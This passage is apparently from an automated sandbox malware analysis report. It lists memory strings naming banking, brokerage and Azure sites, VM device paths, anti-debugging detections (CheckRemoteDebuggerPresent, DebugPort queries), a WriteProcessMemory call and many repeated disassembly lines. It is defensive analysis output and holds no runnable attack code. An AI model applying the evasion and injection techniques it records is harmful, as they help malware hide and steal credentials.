                    Source: hkcmd.exe, 00000006.00000002.979651418.0000000000615000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 0000000E.00000002.2107718363.00000000030C9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.1491438455.0000017A6A93D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: 61b83Fh.14.drBinary or memory string: global block list test formVMware20,11696492231
                    Source: 61b83Fh.14.drBinary or memory string: dev.azure.comVMware20,11696492231j
                    Source: 61b83Fh.14.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: 61b83Fh.14.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: 61b83Fh.14.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: 61b83Fh.14.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: powershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: 61b83Fh.14.drBinary or memory string: tasks.office.comVMware20,11696492231o
                    Source: 61b83Fh.14.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: 61b83Fh.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: 61b83Fh.14.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: 61b83Fh.14.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: powershell.exe, 00000003.00000002.1058546726.0000000008923000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:mand
                    Source: 61b83Fh.14.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: 61b83Fh.14.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: 61b83Fh.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: 61b83Fh.14.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeAPI call chain: ExitProcess graph end nodegraph_6-25028
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F4AF3C GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,6_2_02F4AF3C
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FBD30 rdtscp 11_2_2C4FBD30
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C512C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_2C512C70
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F43F9C LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,6_2_02F43F9C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C504C59 mov eax, dword ptr fs:[00000030h]11_2_2C504C59
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C7C40 mov eax, dword ptr fs:[00000030h]11_2_2C4C7C40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C7C40 mov ecx, dword ptr fs:[00000030h]11_2_2C4C7C40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C7C40 mov eax, dword ptr fs:[00000030h]11_2_2C4C7C40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C7C40 mov eax, dword ptr fs:[00000030h]11_2_2C4C7C40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FC4F mov eax, dword ptr fs:[00000030h]11_2_2C58FC4F
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DAC50 mov eax, dword ptr fs:[00000030h]11_2_2C4DAC50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DAC50 mov eax, dword ptr fs:[00000030h]11_2_2C4DAC50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DAC50 mov eax, dword ptr fs:[00000030h]11_2_2C4DAC50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DAC50 mov eax, dword ptr fs:[00000030h]11_2_2C4DAC50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DAC50 mov eax, dword ptr fs:[00000030h]11_2_2C4DAC50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DAC50 mov eax, dword ptr fs:[00000030h]11_2_2C4DAC50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6C50 mov eax, dword ptr fs:[00000030h]11_2_2C4D6C50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6C50 mov eax, dword ptr fs:[00000030h]11_2_2C4D6C50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D6C50 mov eax, dword ptr fs:[00000030h]11_2_2C4D6C50
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C501C7C mov eax, dword ptr fs:[00000030h]11_2_2C501C7C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1C60 mov eax, dword ptr fs:[00000030h]11_2_2C4E1C60
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E0C00 mov eax, dword ptr fs:[00000030h]11_2_2C4E0C00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E0C00 mov eax, dword ptr fs:[00000030h]11_2_2C4E0C00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E0C00 mov eax, dword ptr fs:[00000030h]11_2_2C4E0C00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E0C00 mov eax, dword ptr fs:[00000030h]11_2_2C4E0C00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50CC00 mov eax, dword ptr fs:[00000030h]11_2_2C50CC00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5ABC01 mov eax, dword ptr fs:[00000030h]11_2_2C5ABC01
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5ABC01 mov eax, dword ptr fs:[00000030h]11_2_2C5ABC01
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C5A1C3C mov eax, dword ptr fs:[00000030h]11_2_2C5A1C3C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C559C32 mov eax, dword ptr fs:[00000030h]11_2_2C559C32
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50BC3B mov esi, dword ptr fs:[00000030h]11_2_2C50BC3B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CEC20 mov eax, dword ptr fs:[00000030h]11_2_2C4CEC20
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59DC27 mov eax, dword ptr fs:[00000030h]11_2_2C59DC27
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59DC27 mov eax, dword ptr fs:[00000030h]11_2_2C59DC27
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59DC27 mov eax, dword ptr fs:[00000030h]11_2_2C59DC27
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CCCC8 mov eax, dword ptr fs:[00000030h]11_2_2C4CCCC8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57FCDF mov eax, dword ptr fs:[00000030h]11_2_2C57FCDF
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57FCDF mov eax, dword ptr fs:[00000030h]11_2_2C57FCDF
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57FCDF mov eax, dword ptr fs:[00000030h]11_2_2C57FCDF
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1CC7 mov eax, dword ptr fs:[00000030h]11_2_2C4E1CC7
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E1CC7 mov eax, dword ptr fs:[00000030h]11_2_2C4E1CC7
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C553CDB mov eax, dword ptr fs:[00000030h]11_2_2C553CDB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C553CDB mov eax, dword ptr fs:[00000030h]11_2_2C553CDB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C553CDB mov eax, dword ptr fs:[00000030h]11_2_2C553CDB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C505CC0 mov eax, dword ptr fs:[00000030h]11_2_2C505CC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C505CC0 mov eax, dword ptr fs:[00000030h]11_2_2C505CC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C7CD5 mov eax, dword ptr fs:[00000030h]11_2_2C4C7CD5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C7CD5 mov eax, dword ptr fs:[00000030h]11_2_2C4C7CD5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C7CD5 mov eax, dword ptr fs:[00000030h]11_2_2C4C7CD5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C7CD5 mov eax, dword ptr fs:[00000030h]11_2_2C4C7CD5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C7CD5 mov eax, dword ptr fs:[00000030h]11_2_2C4C7CD5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C502CF0 mov eax, dword ptr fs:[00000030h]11_2_2C502CF0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C502CF0 mov eax, dword ptr fs:[00000030h]11_2_2C502CF0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C502CF0 mov eax, dword ptr fs:[00000030h]11_2_2C502CF0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C502CF0 mov eax, dword ptr fs:[00000030h]11_2_2C502CF0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C571CF9 mov eax, dword ptr fs:[00000030h]11_2_2C571CF9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C571CF9 mov eax, dword ptr fs:[00000030h]11_2_2C571CF9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C571CF9 mov eax, dword ptr fs:[00000030h]11_2_2C571CF9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C8C8D mov eax, dword ptr fs:[00000030h]11_2_2C4C8C8D
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D3C84 mov eax, dword ptr fs:[00000030h]11_2_2C4D3C84
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D3C84 mov eax, dword ptr fs:[00000030h]11_2_2C4D3C84
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D3C84 mov eax, dword ptr fs:[00000030h]11_2_2C4D3C84
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D3C84 mov eax, dword ptr fs:[00000030h]11_2_2C4D3C84
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CDCA0 mov eax, dword ptr fs:[00000030h]11_2_2C4CDCA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB5 mov eax, dword ptr fs:[00000030h]11_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB5 mov eax, dword ptr fs:[00000030h]11_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB5 mov eax, dword ptr fs:[00000030h]11_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB5 mov eax, dword ptr fs:[00000030h]11_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB5 mov eax, dword ptr fs:[00000030h]11_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB5 mov eax, dword ptr fs:[00000030h]11_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB5 mov eax, dword ptr fs:[00000030h]11_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB5 mov eax, dword ptr fs:[00000030h]11_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB5 mov eax, dword ptr fs:[00000030h]11_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB5 mov eax, dword ptr fs:[00000030h]11_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB5 mov eax, dword ptr fs:[00000030h]11_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB5 mov eax, dword ptr fs:[00000030h]11_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C580CB5 mov eax, dword ptr fs:[00000030h]11_2_2C580CB5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FFCA0 mov ecx, dword ptr fs:[00000030h]11_2_2C4FFCA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FFCA0 mov eax, dword ptr fs:[00000030h]11_2_2C4FFCA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FFCA0 mov eax, dword ptr fs:[00000030h]11_2_2C4FFCA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FFCA0 mov eax, dword ptr fs:[00000030h]11_2_2C4FFCA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FFCA0 mov eax, dword ptr fs:[00000030h]11_2_2C4FFCA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50BCA0 mov eax, dword ptr fs:[00000030h]11_2_2C50BCA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50BCA0 mov eax, dword ptr fs:[00000030h]11_2_2C50BCA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50BCA0 mov ecx, dword ptr fs:[00000030h]11_2_2C50BCA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50BCA0 mov eax, dword ptr fs:[00000030h]11_2_2C50BCA0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58FCAB mov eax, dword ptr fs:[00000030h]11_2_2C58FCAB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F8CB1 mov eax, dword ptr fs:[00000030h]11_2_2C4F8CB1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F8CB1 mov eax, dword ptr fs:[00000030h]11_2_2C4F8CB1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C591D5A mov eax, dword ptr fs:[00000030h]11_2_2C591D5A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C591D5A mov eax, dword ptr fs:[00000030h]11_2_2C591D5A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C591D5A mov eax, dword ptr fs:[00000030h]11_2_2C591D5A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C591D5A mov eax, dword ptr fs:[00000030h]11_2_2C591D5A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C7D41 mov eax, dword ptr fs:[00000030h]11_2_2C4C7D41
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov ecx, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov ecx, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov ecx, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov ecx, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov ecx, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov ecx, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D40 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55DD47 mov eax, dword ptr fs:[00000030h]11_2_2C55DD47
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D0D59 mov eax, dword ptr fs:[00000030h]11_2_2C4D0D59
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D0D59 mov eax, dword ptr fs:[00000030h]11_2_2C4D0D59
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D0D59 mov eax, dword ptr fs:[00000030h]11_2_2C4D0D59
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D8D59 mov eax, dword ptr fs:[00000030h]11_2_2C4D8D59
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D8D59 mov eax, dword ptr fs:[00000030h]11_2_2C4D8D59
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D8D59 mov eax, dword ptr fs:[00000030h]11_2_2C4D8D59
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D8D59 mov eax, dword ptr fs:[00000030h]11_2_2C4D8D59
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D8D59 mov eax, dword ptr fs:[00000030h]11_2_2C4D8D59
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50BD4E mov eax, dword ptr fs:[00000030h]11_2_2C50BD4E
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C50BD4E mov eax, dword ptr fs:[00000030h]11_2_2C50BD4E
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57FD78 mov eax, dword ptr fs:[00000030h]11_2_2C57FD78
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57FD78 mov eax, dword ptr fs:[00000030h]11_2_2C57FD78
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57FD78 mov eax, dword ptr fs:[00000030h]11_2_2C57FD78
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57FD78 mov eax, dword ptr fs:[00000030h]11_2_2C57FD78
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C57FD78 mov eax, dword ptr fs:[00000030h]11_2_2C57FD78
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D7D75 mov eax, dword ptr fs:[00000030h]11_2_2C4D7D75
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D7D75 mov eax, dword ptr fs:[00000030h]11_2_2C4D7D75
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C568D6B mov eax, dword ptr fs:[00000030h]11_2_2C568D6B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C588D10 mov eax, dword ptr fs:[00000030h]11_2_2C588D10
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C588D10 mov eax, dword ptr fs:[00000030h]11_2_2C588D10
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C504D1D mov eax, dword ptr fs:[00000030h]11_2_2C504D1D
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D00 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4EAD00 mov eax, dword ptr fs:[00000030h]11_2_2C4EAD00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4EAD00 mov eax, dword ptr fs:[00000030h]11_2_2C4EAD00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4EAD00 mov eax, dword ptr fs:[00000030h]11_2_2C4EAD00
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C6D10 mov eax, dword ptr fs:[00000030h]11_2_2C4C6D10
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C6D10 mov eax, dword ptr fs:[00000030h]11_2_2C4C6D10
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C6D10 mov eax, dword ptr fs:[00000030h]11_2_2C4C6D10
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4E3D20 mov eax, dword ptr fs:[00000030h]11_2_2C4E3D20
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55FD2A mov eax, dword ptr fs:[00000030h]11_2_2C55FD2A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55FD2A mov eax, dword ptr fs:[00000030h]11_2_2C55FD2A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C55DDC0 mov eax, dword ptr fs:[00000030h]11_2_2C55DDC0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FEDD3 mov eax, dword ptr fs:[00000030h]11_2_2C4FEDD3
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FEDD3 mov eax, dword ptr fs:[00000030h]11_2_2C4FEDD3
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D3DD0 mov eax, dword ptr fs:[00000030h]11_2_2C4D3DD0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D3DD0 mov eax, dword ptr fs:[00000030h]11_2_2C4D3DD0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C59DDC6 mov eax, dword ptr fs:[00000030h]11_2_2C59DDC6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C58DDC7 mov eax, dword ptr fs:[00000030h]11_2_2C58DDC7
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CCDEA mov eax, dword ptr fs:[00000030h]11_2_2C4CCDEA
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CCDEA mov eax, dword ptr fs:[00000030h]11_2_2C4CCDEA
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DADE0 mov eax, dword ptr fs:[00000030h]11_2_2C4DADE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DADE0 mov eax, dword ptr fs:[00000030h]11_2_2C4DADE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DADE0 mov eax, dword ptr fs:[00000030h]11_2_2C4DADE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DADE0 mov eax, dword ptr fs:[00000030h]11_2_2C4DADE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DADE0 mov eax, dword ptr fs:[00000030h]11_2_2C4DADE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4DADE0 mov eax, dword ptr fs:[00000030h]11_2_2C4DADE0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4F0DE1 mov eax, dword ptr fs:[00000030h]11_2_2C4F0DE1
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C6DF6 mov eax, dword ptr fs:[00000030h]11_2_2C4C6DF6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FCDF0 mov eax, dword ptr fs:[00000030h]11_2_2C4FCDF0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FCDF0 mov ecx, dword ptr fs:[00000030h]11_2_2C4FCDF0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4CFD80 mov eax, dword ptr fs:[00000030h]11_2_2C4CFD80
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C9D96 mov eax, dword ptr fs:[00000030h]11_2_2C4C9D96
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4C9D96 mov eax, dword ptr fs:[00000030h]11_2_2C4C9D96
